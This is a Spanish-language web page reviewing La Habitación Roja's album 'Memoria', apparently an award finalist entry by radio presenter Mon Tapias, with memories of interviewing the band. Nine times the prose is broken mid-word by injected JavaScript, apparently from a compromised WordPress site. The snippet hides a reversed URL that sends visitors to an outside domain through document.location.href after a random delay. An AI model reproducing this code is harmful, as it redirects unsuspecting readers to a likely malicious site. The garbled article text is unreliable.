FINALISTA 3 – 2018: MEMORIA, DE LA HABITACIÓN ROJA

    memoria-la-habitacion-roja


    Memoria, de La Habitación Roja, por Mon Tapias ( PAM – Los 40 Classic)

    Hace unos años tuve la suerte de poder pasar un par de horas con Pau y Jorge en una antigua televisión que me dio muchas alegrías, la difunta KISSTV. Teníamos un programa donde los artistas escogían sus 14 vídeos favoritoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos de la histoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toria (aproximadamente entran 14 vídeos en una hora). Grabamos 4.5 horas de presentaciones, no podían parar, no era justoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to elegir solamente 14.

    Es una definición exacta de vivir por y para la música, hay músicos que gozan hablando de música, es el caso. Hay muchos otros músicos que no, aunque no me creas, es ciertoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to.

    Memoria me traslada a las mejores melodías de La Habitación Roja, recuerdo el Eje del Mal  (2006), ahí les conocí, pero también me suena a ratoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos a Universal (2010) el disco que literalmente me dio la vuelta a la cabeza del grupo, para mí… un clásico básico.

    Hablar de La Habitación Roja es hablar de melodías, de brutales guitarras y letras embellecidas por el pop más clásico pero también más actual. Banda de referencia para cualquier joven que quiera montar una banda. 20 años regalando canciones, estribillos contundentes, letras y armonías perfectamente ejecutadas.

    Este último disco de La Habitación Roja tiene toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}todos los ingredientes que el grupo suele utilizar para sus recetas musicales, y funciona, vaya si funciona. Es perfectoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to para empezar a bucear en ese Universo tan peculiar que tienen estoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos ilustres valencianos. No suele ser el caso, pero en este caso personalmente recomiendo empezar por este disco si nunca los has oído. Hay nuevos matices sobre un sonido característico y de pleno derecho, el sonido de La Habitación Roja.

    No voy a desgranarte el disco, debes oírlo y sacar tus propias conclusiones. Solo te digo una cosa, ¿Quién eres tú? que cierra el disco, te toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tocará el alma si has sufrido de cerca el Alzheimer. Y Nuevos Románticos que abre el disco es La Habitación Roja en estado puro.

    Que lo disfruten.